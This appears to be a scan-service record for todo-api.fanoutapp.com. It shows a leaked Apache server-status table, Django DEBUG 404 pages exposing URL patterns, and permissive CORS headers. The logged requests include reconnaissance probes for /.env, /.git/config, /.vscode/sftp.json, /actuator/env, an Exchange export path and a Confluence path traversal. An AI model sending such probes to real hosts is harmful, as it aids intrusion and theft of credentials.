127.0.0.1http/1.1chat.fanoutapp.com:8000GET /config.json HTTP/1.1 0-0207930/46/46_ 1.04231800.00.120.12 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-0207930/44/44_ 1.05031750.00.180.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-0207930/41/41_ 1.05031700.00.130.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0207930/44/44_ 1.042221850.00.190.19 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-02079311/43/43W 1.03001710.00.330.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-0207930/45/45_ 1.042121710.00.330.33 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /info.php HTTP/1.1 0-0207930/42/42_ 1.011411640.00.260.26 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-0207930/43/43_ 1.04541700.00.190.19 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-0207930/52/52_ 1.05132130.00.200.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-0207930/45/45_ 1.05131800.00.110.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-0207930/45/45_ 1.042321780.00.190.19 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /login.action HTTP/1.1 0-0207930/45/45_ 1.042221910.00.120.12 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.env HTTP/1.1 0-0207930/43/43_ 1.042121720.00.040.04 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-0207930/46/46_ 1.05121770.00.260.26 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-0207930/43/43_ 1.011631680.00.030.03 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?after=12621 HTTP/1.1 0-0207930/49/49_ 1.05132010.00.120.12 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-0207940/17/17_ 0.38136810.00.160.16 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 1-0207940/17/17_ 0.38104730.00.090.09 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 1-0207940/18/18_ 0.381144920.00.170.17 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-0207940/15/15_ 0.38113710.00.090.09 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?after=12621 HTTP/1.1 1-0207940/17/17_ 0.38133640.00.240.24 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-0207940/16/16_ 0.38115660.00.020.02 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 1-0207940/15/15_ 0.38115600.00.090.09 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-0207940/13/13_ 0.38123490.00.090.09 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-0207940/14/14_ 0.38123580.00.020.02 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-0207940/14/14_ 0.37134720.00.090.09 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-0207940/15/15_ 0.38133580.00.090.09 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-0207940/14/14_ 0.37145710.00.010.01 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 1-0207940/14/14_ 0.38115580.00.170.17 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env HTTP/1.1 1-0207940/15/15_ 0.38125600.00.090.09 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 1-0207940/16/16_ 0.38120590.00.170.17 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 1-0207940/17/17_ 0.37175640.00.160.16 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 1-0207940/13/13_ 0.37173500.00.080.08 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?after=12621 HTTP/1.1 1-0207940/12/12_ 0.36173450.00.080.08 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?after=12621 HTTP/1.1 1-0207940/14/14_ 0.3603600.00.010.01 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?after=12621 HTTP/1.1 1-0207940/16/16_ 0.38543060.00.160.16 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?after=12621 HTTP/1.1 1-0207940/15/15_ 0.3895680.00.080.08 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0207940/16/16_ 0.381034640.00.090.09 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-0207940/16/16_ 0.38105890.00.170.17 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 1-0207940/12/12_ 0.38135500.00.010.01 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 1-0207940/13/13_ 0.38105610.00.020.02
Open service 151.101.193.91:443 · todo-api.fanoutapp.com
2026-01-09 19:31
HTTP/1.1 404 NOT FOUND
Connection: close
Content-Length: 2140
Date: Fri, 09 Jan 2026 19:31:38 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Open service 34.27.193.201:80 · todo-api.fanoutapp.com
2026-01-09 18:51
HTTP/1.1 404 NOT FOUND
Date: Fri, 09 Jan 2026 18:51:20 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Content-Length: 2140
Connection: close
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Open service 151.101.193.91:443 · todo-api.fanoutapp.com
2026-01-04 04:37
HTTP/1.1 404 NOT FOUND
Connection: close
Content-Length: 2140
Date: Sun, 04 Jan 2026 04:37:18 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Open service 2a04:4e42:600::347:80 · todo-api.fanoutapp.com
2026-01-04 04:37
HTTP/1.1 308 Permanent Redirect Connection: close Content-Length: 111 location: https://todo-api.fanoutapp.com/ content-type: text/html; charset=utf-8 Page title: Moved <!DOCTYPE html><TITLE>Moved</TITLE><P>The document has moved <A HREF="https://todo-api.fanoutapp.com/">here</A>
Open service 2a04:4e42:400::347:80 · todo-api.fanoutapp.com
2026-01-04 04:37
HTTP/1.1 308 Permanent Redirect Connection: close Content-Length: 111 location: https://todo-api.fanoutapp.com/ content-type: text/html; charset=utf-8 Page title: Moved <!DOCTYPE html><TITLE>Moved</TITLE><P>The document has moved <A HREF="https://todo-api.fanoutapp.com/">here</A>
Open service 2a04:4e42:600::347:443 · todo-api.fanoutapp.com
2026-01-04 04:37
HTTP/1.1 404 NOT FOUND
Connection: close
Content-Length: 2140
Date: Sun, 04 Jan 2026 04:37:17 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Open service 2a04:4e42:400::347:443 · todo-api.fanoutapp.com
2026-01-04 04:37
HTTP/1.1 404 NOT FOUND
Connection: close
Date: Sun, 04 Jan 2026 04:37:16 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
transfer-encoding: chunked
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Open service 2a04:4e42:200::347:80 · todo-api.fanoutapp.com
2026-01-04 04:37
HTTP/1.1 308 Permanent Redirect Connection: close Content-Length: 111 location: https://todo-api.fanoutapp.com/ content-type: text/html; charset=utf-8 Page title: Moved <!DOCTYPE html><TITLE>Moved</TITLE><P>The document has moved <A HREF="https://todo-api.fanoutapp.com/">here</A>
Open service 2a04:4e42::347:443 · todo-api.fanoutapp.com
2026-01-04 04:37
HTTP/1.1 404 NOT FOUND
Connection: close
Content-Length: 2140
Date: Sun, 04 Jan 2026 04:37:16 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Open service 2a04:4e42:200::347:443 · todo-api.fanoutapp.com
2026-01-04 04:37
HTTP/1.1 404 NOT FOUND
Connection: close
Content-Length: 2140
Date: Sun, 04 Jan 2026 04:37:16 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Open service 2a04:4e42::347:80 · todo-api.fanoutapp.com
2026-01-04 04:37
HTTP/1.1 308 Permanent Redirect Connection: close Content-Length: 111 location: https://todo-api.fanoutapp.com/ content-type: text/html; charset=utf-8 Page title: Moved <!DOCTYPE html><TITLE>Moved</TITLE><P>The document has moved <A HREF="https://todo-api.fanoutapp.com/">here</A>
Open service 151.101.1.91:80 · todo-api.fanoutapp.com
2026-01-04 04:37
HTTP/1.1 308 Permanent Redirect Connection: close Content-Length: 111 location: https://todo-api.fanoutapp.com/ content-type: text/html; charset=utf-8 Page title: Moved <!DOCTYPE html><TITLE>Moved</TITLE><P>The document has moved <A HREF="https://todo-api.fanoutapp.com/">here</A>
Open service 151.101.193.91:80 · todo-api.fanoutapp.com
2026-01-04 04:37
HTTP/1.1 308 Permanent Redirect Connection: close Content-Length: 111 location: https://todo-api.fanoutapp.com/ content-type: text/html; charset=utf-8 Page title: Moved <!DOCTYPE html><TITLE>Moved</TITLE><P>The document has moved <A HREF="https://todo-api.fanoutapp.com/">here</A>
Open service 151.101.65.91:443 · todo-api.fanoutapp.com
2026-01-04 04:37
HTTP/1.1 404 NOT FOUND
Connection: close
Content-Length: 2140
Date: Sun, 04 Jan 2026 04:37:17 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Open service 151.101.1.91:443 · todo-api.fanoutapp.com
2026-01-04 04:37
HTTP/1.1 404 NOT FOUND
Connection: close
Content-Length: 2140
Date: Sun, 04 Jan 2026 04:37:17 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Open service 151.101.65.91:80 · todo-api.fanoutapp.com
2026-01-04 04:37
HTTP/1.1 308 Permanent Redirect Connection: close Content-Length: 111 location: https://todo-api.fanoutapp.com/ content-type: text/html; charset=utf-8 Page title: Moved <!DOCTYPE html><TITLE>Moved</TITLE><P>The document has moved <A HREF="https://todo-api.fanoutapp.com/">here</A>
Open service 151.101.129.91:80 · todo-api.fanoutapp.com
2026-01-04 04:37
HTTP/1.1 308 Permanent Redirect Connection: close Content-Length: 111 location: https://todo-api.fanoutapp.com/ content-type: text/html; charset=utf-8 Page title: Moved <!DOCTYPE html><TITLE>Moved</TITLE><P>The document has moved <A HREF="https://todo-api.fanoutapp.com/">here</A>
Open service 151.101.129.91:443 · todo-api.fanoutapp.com
2026-01-04 04:37
HTTP/1.1 404 NOT FOUND
Connection: close
Content-Length: 2140
Date: Sun, 04 Jan 2026 04:37:17 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
